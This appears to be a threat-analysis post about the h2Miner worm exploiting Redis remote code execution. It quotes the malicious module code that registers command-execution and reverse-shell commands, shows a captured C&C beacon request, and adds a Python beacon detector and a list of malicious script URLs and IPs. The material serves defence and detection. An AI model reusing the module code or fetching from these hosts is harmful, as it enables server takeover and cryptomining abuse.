New Outbreak of h2Miner Worms Exploiting Redis RCE Detected

H2Miner Gang

Redis RCE

Worm Analysis

    /* Excerpt from the malicious Redis module's load routine. It registers
       two custom commands: system.exec (handled by DoCommand, runs a command
       on the host) and system.rev (handled by RevShellCommand, the module's
       reverse-shell handler). Loading this module on an exposed Redis
       instance is what turns unauthenticated access into code execution. */
    if (RedisModule_CreateCommand(ctx, "system.exec",
                                  DoCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
    if (RedisModule_CreateCommand(ctx, "system.rev",
                                  RevShellCommand, "readonly", 1, 1, 1) == REDISMODULE_ERR)
        return REDISMODULE_ERR;
  • Download the payload file and execute it
  • Execute the mining program
  • Maintain C&C communication and execute the commands it receives
GET /h HTTP/1.1
Host: 91.215.169.111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Arch: amd64
Cores: 2
Mem: 3944
Os: linux
Osname: debian
Osversion: 10.0
Root: false
S: k
Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx
Version: 26
Accept-Encoding: gzip
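The beacon above is distinctive: besides a browser-like User-Agent it carries a set of non-standard host-profiling headers (Arch, Cores, Mem, Os, Osname, Osversion, Root, Uuid, Version) and is addressed to one of the IOC hosts. The following detection helper is an added example, not code from the original post or from the worm's authors. It parses raw HTTP request text, flags requests that carry that header set (the threshold of five matching headers is an assumption chosen to limit false positives) or that are addressed to a host from the IOC list below, and runs over two constructed sample requests: one copied from the beacon shown above and one benign request.

```python
"""Detect h2Miner-style C&C beacons in raw HTTP request text.

Added example (not part of the original article). IOC_HOSTS is built from
the hosts in the article's IOC section; the sample requests are constructed
for illustration.
"""
from typing import Dict, List, Tuple

# Hosts from the article's IOC section (URL entries reduced to their host).
IOC_HOSTS = {
    "142.44.191.122", "185.92.74.42", "195.3.146.118",
    "45.10.88.102", "91.215.169.111", "139.99.50.255",
    "46.243.253.167", "195.123.220.193",
}

# Non-standard headers the beacon uses to report the victim's profile.
BEACON_HEADERS = {"arch", "cores", "mem", "os", "osname",
                  "osversion", "root", "uuid", "version"}
# Assumed threshold: require several of them before calling it a beacon.
MIN_BEACON_HEADERS = 5


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Parse the head of a raw HTTP/1.x request into (method, path, headers).

    Header names are lower-cased so lookups are case-insensitive.
    """
    sep = "\r\n\r\n" if "\r\n\r\n" in raw else "\n\n"
    head = raw.split(sep, 1)[0]
    lines = [line for line in head.splitlines() if line.strip()]
    method, path, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers


def classify(raw: str) -> Dict[str, object]:
    """Return a verdict dict: host, path, suspicious flag and the reasons."""
    _method, path, headers = parse_request(raw)
    host = headers.get("host", "").split(":")[0]
    matched = sorted(BEACON_HEADERS & headers.keys())
    reasons: List[str] = []
    if len(matched) >= MIN_BEACON_HEADERS:
        reasons.append("beacon-style profiling headers: " + ", ".join(matched))
    if host in IOC_HOSTS:
        reasons.append("destination host in IOC list: " + host)
    return {"host": host, "path": path,
            "suspicious": bool(reasons), "reasons": reasons}


# Constructed sample 1: the beacon from the article (Uuid redacted as shown).
BEACON_SAMPLE = (
    "GET /h HTTP/1.1\r\n"
    "Host: 91.215.169.111\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
    "(KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36\r\n"
    "Arch: amd64\r\nCores: 2\r\nMem: 3944\r\nOs: linux\r\nOsname: debian\r\n"
    "Osversion: 10.0\r\nRoot: false\r\nS: k\r\n"
    "Uuid: xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxx\r\nVersion: 26\r\n"
    "Accept-Encoding: gzip\r\n\r\n"
)

# Constructed sample 2: an ordinary request that must not be flagged.
BENIGN_SAMPLE = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.com\r\n"
    "User-Agent: Mozilla/5.0\r\n"
    "Accept: text/html\r\n\r\n"
)


def scan(requests: List[str]) -> List[Dict[str, object]]:
    """Classify every request and return only the suspicious verdicts."""
    return [v for v in (classify(r) for r in requests) if v["suspicious"]]


if __name__ == "__main__":
    for verdict in scan([BEACON_SAMPLE, BENIGN_SAMPLE]):
        print(verdict["host"], verdict["path"], "->", "; ".join(verdict["reasons"]))
```

Run against a proxy or IDS capture, the header check catches beacons even after the operators rotate C&C addresses, while the host check catches traffic to the known infrastructure regardless of headers; keeping both reasons in the verdict makes it clear which signal fired.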

Other Attack Methods

IOC

142.44.191.122/t.sh
185.92.74.42/h.sh
142.44.191.122/spr.sh
142.44.191.122/spre.sh
195.3.146.118/unk.sh
45.10.88.102
91.215.169.111
139.99.50.255
46.243.253.167
195.123.220.193

Security Advice

Original Source:


Follow me to keep abreast with the latest technology news, industry insights, and developer trends. Alibaba Cloud website:https://www.alibabacloud.com
